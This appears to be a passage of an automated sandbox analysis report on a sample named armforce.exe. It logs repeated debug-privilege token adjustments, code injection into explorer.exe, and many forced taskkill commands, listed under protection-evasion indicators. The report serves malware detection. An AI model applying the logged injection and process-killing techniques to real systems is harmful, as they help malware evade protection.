Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\inst_fold\armforce.exe	Memory written: PID: 4092 base: 50000 value: 01
Source: C:\inst_fold\armforce.exe	Memory written: PID: 4092 base: 50020 value: 9A
Source: C:\inst_fold\armforce.exe	Memory written: PID: 4092 base: 7FFDF238 value: 00

Uses taskkill to terminate processes

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
